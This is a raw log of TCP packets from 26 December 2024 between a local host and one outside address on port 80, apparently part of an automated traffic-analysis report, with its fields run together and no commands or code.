                                                                                      Dec 26, 2024 12:05:23.705714941 CET8049739185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:23.772825003 CET8049740185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.213049889 CET8049740185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.213119984 CET8049740185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.213175058 CET4974080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.213268995 CET4974080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.213268995 CET4974080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.330359936 CET4974780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.332806110 CET8049740185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.336663008 CET8049739185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.336733103 CET4973980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.336774111 CET4973980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.336879969 CET8049739185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.336915016 CET4973980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.450010061 CET8049747185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.450082064 CET4974780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.454453945 CET4974780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.456418991 CET8049739185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.456779957 CET4974880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.573887110 CET8049747185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.576272011 CET8049748185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:25.576467037 CET4974880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.576467037 CET4974880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:25.695987940 CET8049748185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:26.991854906 CET8049747185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:26.991873980 CET8049747185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:26.991940022 CET4974780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:26.999332905 CET4974780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.113908052 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.119254112 CET8049747185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.234071016 CET8049749185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.234154940 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.239104986 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.262382984 CET8049748185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.262645960 CET8049748185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.262698889 CET4974880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.262995958 CET4974880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.359448910 CET8049749185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.382524967 CET8049748185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.389924049 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.509521008 CET8049751185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:27.511689901 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.512947083 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:27.632405043 CET8049751185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:28.803538084 CET8049749185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:28.803592920 CET8049749185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:28.803666115 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:28.803666115 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:28.833885908 CET4974980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:28.953463078 CET8049749185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.161118031 CET4975780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.193084002 CET8049751185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.193150043 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.202536106 CET8049751185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.202604055 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.205816031 CET4975180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.280738115 CET8049757185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.283691883 CET4975780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.325335026 CET8049751185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.347136974 CET4975780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.466691971 CET8049757185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.603984118 CET4975880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.723593950 CET8049758185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:29.723668098 CET4975880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.724036932 CET4975880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:29.843827963 CET8049758185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:30.941838980 CET8049757185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:30.942042112 CET8049757185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:30.942167044 CET4975780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:30.942265987 CET4975780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.053806067 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.061855078 CET8049757185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.173702002 CET8049764185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.175725937 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.187340975 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.306891918 CET8049764185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.405518055 CET8049758185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.405670881 CET8049758185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.405757904 CET4975880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.405818939 CET4975880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.525609970 CET8049758185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.568572044 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.688271046 CET8049765185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:31.688384056 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.688479900 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:31.808142900 CET8049765185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:32.720691919 CET8049764185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:32.720771074 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:32.720841885 CET8049764185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:32.720871925 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:32.720897913 CET4976480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:32.830033064 CET4977180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:32.840388060 CET8049764185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:32.949770927 CET8049771185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:32.949865103 CET4977180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:32.950047970 CET4977180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.069461107 CET8049771185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.369787931 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.369833946 CET4977180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.443154097 CET8049765185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.443212986 CET8049765185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.443264008 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.443435907 CET4976580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.488325119 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.503598928 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.608055115 CET8049772185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.608144045 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.623171091 CET8049773185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.625363111 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.625411987 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.640759945 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:33.744966030 CET8049772185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:33.760296106 CET8049773185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.153724909 CET8049772185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.153805971 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.153815985 CET8049772185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.153858900 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.197727919 CET4977280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.317442894 CET8049772185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.326894999 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.422909975 CET8049773185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.422956944 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.423022985 CET8049773185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.423058033 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.435978889 CET4977380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.446733952 CET8049779185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.446813107 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.448354959 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.563431025 CET8049773185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.567877054 CET8049779185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.571754932 CET4978080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.747510910 CET8049780185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:35.747605085 CET4978080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.747701883 CET4978080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:35.867146969 CET8049780185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:36.992274046 CET8049779185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:36.992305040 CET8049779185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:36.992352009 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:36.992384911 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:36.992384911 CET4977980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.098368883 CET4978480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.112237930 CET8049779185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.217995882 CET8049784185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.218089104 CET4978480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.218184948 CET4978480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.337791920 CET8049784185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.466387987 CET8049780185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.466527939 CET8049780185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.466626883 CET4978080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.593009949 CET4978080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:37.712507963 CET8049780185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:37.921926022 CET4978580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:38.041512012 CET8049785185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:38.041594028 CET4978580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:38.041841030 CET4978580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:38.163978100 CET8049785185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:38.771253109 CET8049784185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:38.771281004 CET8049784185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:38.771368027 CET4978480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:38.771449089 CET4978480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:38.891227007 CET8049784185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:38.903743029 CET4978880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.023287058 CET8049788185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:39.023372889 CET4978880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.031235933 CET4978880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.150835991 CET8049788185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:39.453495026 CET4978580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.453520060 CET4978880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.564838886 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.577627897 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.684571028 CET8049792185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:39.686137915 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.686311960 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.697149992 CET8049793185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:39.699822903 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.699892998 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:39.805860996 CET8049792185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:39.819463968 CET8049793185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.247416019 CET8049792185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.247519016 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.247632027 CET8049792185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.247689009 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.263369083 CET4979280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.362009048 CET8049793185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.362060070 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.362201929 CET8049793185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.362253904 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.372282982 CET4979380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.382561922 CET4979680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.383117914 CET8049792185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.491827011 CET8049793185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.502084970 CET8049796185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.502240896 CET4979680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.502629042 CET4979680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.522064924 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.622076035 CET8049796185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.641649961 CET8049797185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:41.641721964 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.641930103 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:41.761344910 CET8049797185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.115217924 CET8049796185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.115326881 CET8049796185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.115413904 CET4979680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.179828882 CET4979680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.299298048 CET8049796185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.326915979 CET8049797185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.326972961 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.327014923 CET8049797185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.327058077 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.332214117 CET4979780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.336885929 CET4980380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.451944113 CET8049797185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.456820965 CET8049803185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.456892014 CET4980380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.457068920 CET4980380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.457479954 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.576512098 CET8049803185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.576966047 CET8049804185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:43.577111006 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.577195883 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:43.696723938 CET8049804185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:44.850924969 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:44.970669985 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:44.971715927 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:44.975020885 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.007209063 CET8049803185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.007371902 CET8049803185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.007457018 CET4980380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.007503986 CET4980380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094748020 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094784021 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094813108 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094835997 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094841957 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094871044 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094886065 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094897985 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094898939 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094918013 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094923973 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094935894 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094939947 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094958067 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094968081 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.094969988 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.094980001 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.095001936 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.095015049 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.110685110 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.128364086 CET8049803185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.214797020 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.214809895 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.214875937 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.214932919 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.214942932 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.214989901 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.215044975 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.215054989 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.215099096 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.230226994 CET8049809185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.230329990 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.230406046 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.257673979 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.257802010 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.263191938 CET8049804185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.263262033 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.263294935 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.263365984 CET8049804185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.263484001 CET4980480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.350294113 CET8049809185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.377473116 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.377587080 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.382807970 CET8049804185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.391602993 CET4981180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.417809963 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.417877913 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.511372089 CET8049811185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.511746883 CET4981180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.511857986 CET4981180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.537462950 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.539649010 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:45.631453037 CET8049811185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:45.701631069 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.112157106 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.794706106 CET8049809185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.794971943 CET8049809185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.795039892 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:46.795039892 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:46.795039892 CET4980980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:46.907485962 CET4981680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:46.914633989 CET8049809185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.995048046 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:46.995282888 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.027039051 CET8049816185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.027107000 CET4981680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.027240038 CET4981680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.115991116 CET8049808185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.116092920 CET4980880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.146785021 CET8049816185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.453613997 CET4981680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.453623056 CET4981180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.563699961 CET4981780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.575289011 CET4981880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.683543921 CET8049817185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.683759928 CET4981780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.683759928 CET4981780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.695147038 CET8049818185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.695238113 CET4981880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.695264101 CET4981880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:47.803544998 CET8049817185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:47.815172911 CET8049818185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:51.576170921 CET4981780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.576200962 CET4981880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.689389944 CET4982980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.700412035 CET4983080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.809021950 CET8049829185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:51.809204102 CET4982980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.809298038 CET4982980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.820164919 CET8049830185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:51.820245028 CET4983080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.820303917 CET4983080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:51.929080963 CET8049829185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:51.939887047 CET8049830185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:55.703665972 CET4982980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:55.703742027 CET4983080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:55.819123983 CET4984180192.168.2.5185.81.68.147
